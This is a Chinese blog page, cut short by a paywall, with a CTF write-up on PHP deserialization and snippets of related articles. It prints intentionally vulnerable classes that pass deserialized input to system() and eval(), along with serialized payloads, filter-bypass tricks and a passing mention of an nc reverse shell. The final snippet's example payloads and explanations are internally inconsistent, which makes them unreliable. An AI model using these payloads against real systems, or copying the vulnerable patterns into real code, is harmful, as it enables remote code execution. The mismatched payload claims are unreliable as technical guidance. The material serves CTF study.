PHP反序列化部分题目解析

最新推荐文章于 2025-01-12 20:59:34 发布
最新推荐文章于 2025-01-12 20:59:34 发布
阅读量581 收藏 10
点赞数 5
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LS_Sy/article/details/136134096
版权

PHP反序列化部分题目解析

1.[SWPUCTF 2022 新生赛]1z_unserialize

首先进入靶场后,我们可以直接看到题目的php源码如下:

<?php
 
class lyh{
   
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
     
     function  __destruct()
     {
   
        $a = $this->lt;

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
 
 
?>

稍加分析,我们可以知道在实现nss反序列化的同时,会触发__destruct()的魔术方法将lt的值赋给a,然后调用a中存储的函数,并将lly属性的值作为参数传递给该函数,由此我们想到把a变成system();this->lly变成ls就可以了

进行构造:

<?php

class lyh{
   
    public $url = 'NSSCTF.com';
    public $lt="system";
    public $lly="cat";

}
最低0.47元/天 解锁文章
【网络安全 | CTF】记一次PHP序列化反序列化详析
等风来
08-24 5716
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
PHP反序列化CTF
bwxzdjn的博客
03-25 6191
用代码审计的方式分析一道典型的存在PHP反序列化漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。
[SWPUCTF 2022 新生赛]ez_ez_unserialize
wangrong0966的博客
01-12 165
这是因为 PHP反序列化过程中,会根据序列化字符串中指定的属性个数来处理对象的属性。如果指定的属性个数大于实际的属性个数,PHP 会认为对象的属性已经完整,从而跳过。:定义了一个公共属性 $x,默认值为当前文件的路径(__FILE__ 是一个魔术常量,表示当前文件的完整路径)。在 PHP 中,当序列化字符串中表示对象属性个数的值大于实际属性个数时,可以绕过。是一个构造方法,用于在创建对象时初始化对象的状态。它用于执行一些在对象反序列化后需要进行的操作。它用于执行一些在对象销毁前需要进行的操作。
从一道CTF学习PHP反序列化漏洞-附件资源
03-02
从一道CTF学习PHP反序列化漏洞-附件资源
CTF-PHP反序列化
m0_65336233的博客
10-18 1488
CTF-PHP反序列化
CTF-php反序列化 (下)
2301_81556781的博客
09-15 1038
这个地方,正常逻辑是3只有一个字符,但是却被标注为28个,那么在反序列化的时候,就会出现报错,但是此反序列化之前会对msg的参数进行替换操作,会将4个字符的fuck替换5个关字符的loveu,这样的话本来缺少的27个字符,就会被经过增加替换而多出来的27个字符顶替,正好满足136=109(love)+27(u),而后面的27个字符也就顺理成章的替换了后面的token。"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
php反序列化1_常见php序列化的CTF
书山有路勤为径,学海无涯苦作舟
11-25 1757
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
CTF中的反序列化题目
weixin_50372036的博客
06-25 974
其次是wakeup,wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了,但是注意这里file 的类型是private,所以打印出来的串是有不可见字符%00的,不要复制出来自己base,不然结果就不一样了。方法有一个CVE漏洞,CVE-2016-7124,在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。传入s中,就得到了执行phpinfo后的界面,完成了执行流程的改变。
PHP反序列化题目记录
BaiScorpio的博客
06-20 956
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例学习的过程。...
PHP反序列化-CTF-攻防世界-unseping
theenderofroot的博客
05-18 367
_wakeup方法使用waf方法对$args的内容进行了过滤,过滤掉了| &;__destruct方法检测ping是否在$method中,并调用了名为$method的方法,以数组$args中的值作为参数。综合来看就是通过$method和__construct来调用构造的ping方法,接着通过$args作为输入口进行命令的输入。此时这个最终的payload的中,我们采用单双引号绕过正则过滤,${IFS}绕过空格过滤,printf绕过/过滤。此处使用了${IFS}绕过了空格过滤,返回结果如下。
CTF---php反序列化字符串溢出
3tefanie丶zhou的博客
12-28 2891
【我们的言语,既会千山万水,迷障横生,也能铺路搭桥,柳暗花明。故而与亲近之人朝夕久处,不可说气话,不可说反话,不可不说话。】
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛)
Eason_LYC安全白帽子的成长博客
05-08 3087
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷备赛,打下坚实的基础~
PHP反序列化【原理+CTF实战】
2301_80127209的博客
04-19 1442
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
反序列化学习笔记【一文打通ctf中的反序列化题目
jayq1的博客
07-21 7578
本文包含反序列化的各类题目,比如基础的php反序列化 反序列化字符逃逸 phar反序列化 Pickle反序列化 师傅们轻点喷~
php反序列化漏洞典型例
m0_62284238的博客
10-28 1062
ctfhub-技能树-pklovecloud引用题目:2021-第五空间智能安全大赛-Web-pklovecloud。
【网络安全 | CTFCTF极客大挑战2019PHP详析(Dirsearch+php反序列化
等风来
08-24 7223
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
SWPUCTF 2022新生赛 web部分wp
weixin_44770698的博客
01-16 4657
SWPUCTF 2022新生赛
[SWPUCTF 2022 新生赛]部分web
2301_80470992的博客
02-13 1058
分析题目这段 PHP 代码定义了一个名为lyh的类,并在其中定义了一些属性和方法。然后,它使用函数来反序列化从 POST 请求中接收到的数据,并最后使用函数高亮显示当前文件的源代码。类定义 (lyh$url$lt$lly$this->lt$a$a$this->lly代码执行流程lyh__destruct$lt$lly这个题目是一很标准的反序列化构造链条得到以下payload=O:3:"lyh":3:{s:3:"url";s:2:"lt";s:3:"lly";s:2:"ls";
php反序列化题目
最新发布
03-16
### PHP反序列化漏洞原理 PHP反序列化是一种常见的安全漏洞,通常发生在应用程序尝试将字符串转换回对象的过程中。如果攻击者能够控制输入的序列化字符串并将其传递给`unserialize()`函数,则可能触发恶意行为。这种漏洞的核心在于利用PHP中的魔术方法(如`__wakeup()`、`__destruct()`等),这些方法会在特定时刻自动调用[^1]。 #### 漏洞成因分析 当开发者未对用户提交的数据进行严格的校验时,可能会引入不可信的序列化数据。一旦该数据被解码为对象实例,就可能导致意外的行为发生。例如,在某些情况下,可以执行任意代码或者泄露敏感信息[^2]。 #### 实际案例解析 考虑下面这个简单的例子: ```php <?php class Files { public $b = 'echo "ok";'; function __destruct() { eval($this->b); } } // 如果允许外部修改$b的内容, 则可注入命令 $file = unserialize($_GET['data']); ?> ``` 在这个脚本里,只要传入合适的参数就能让服务器端运行指定指令。比如请求URL如下所示将会打印出"hello world": http://example.com/vuln.php?data=O%3A5%3A%22Files%22%3A1%3A%7Bs%3A1%3A%22b%22%3BO%3A9%3A%22SplFileInfo%22%3A0%3A%7B%7D%3B%7D 上述链接中包含了经过base64编码后的payload(O:5:"Files":...) ,它实际上代表了一个Files类的对象定义,并且其成员变量$b已被篡改为新的有效载荷。 #### 关键技术点探讨 为了更好地理解如何构建有效的POP链(即Property Oriented Programming Chain),我们需要熟悉几个重要的概念和技术细节: - **魔术方法的应用**: 如前所述,多个特殊名称的方法可以在不同场景下调用到。除了前面提到过的两个之外还有其他几种值得注意的情况,像`__toString()`用于强制转换为字符串操作之前等等[^4]。 - **类型混淆技巧**: 不同版本之间可能存在兼容性差异,这使得即使表面上看起来相同的结构也可能因为内部实现机制的不同而表现出不一样的特性。因此了解各个发行版之间的区别非常重要[^3]. ### 推荐的学习材料与实践题目 以下是几份不错的参考资料供进一步深入研究: 1. OWASP官方文档关于Deserialization Flaws章节提供了详尽描述以及防御措施建议. 2. CTF比赛平台HackTheBox上有很多涉及此类问的真实环境模拟挑战可供实战演练. 3. SANS Institute发布的白皮书《Secure Coding Guidelines》也涵盖了相关内容讨论. 最后附带一段示范性的测试代码帮助初学者快速入门: ```php <?php error_reporting(E_ALL); class Demo{ private $cmd; public function setCmd($value){ $this->cmd=$value; } public function execute(){ system($this->cmd); } public function __destruct(){ echo "\nExecuting command...\n"; $this->execute(); } } if(isset($_POST["action"])){ @unlink("tmp.ser"); file_put_contents('tmp.ser', serialize(unserialize(base64_decode($_POST["action"])))); }else{ highlight_file(__FILE__); } ?> <form method="post"> <input type="text" name="action"/> <button>Submit</button> </form> <!-- Example payload --> <textarea readonly style="width:100%;height:5em;"> TzoxMDoiRGVtb2NsdXNpdmUiOjE6e3M6NToidGFiIjtPOjQ6IkRlbW8iOjA6e319 </textarea> ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值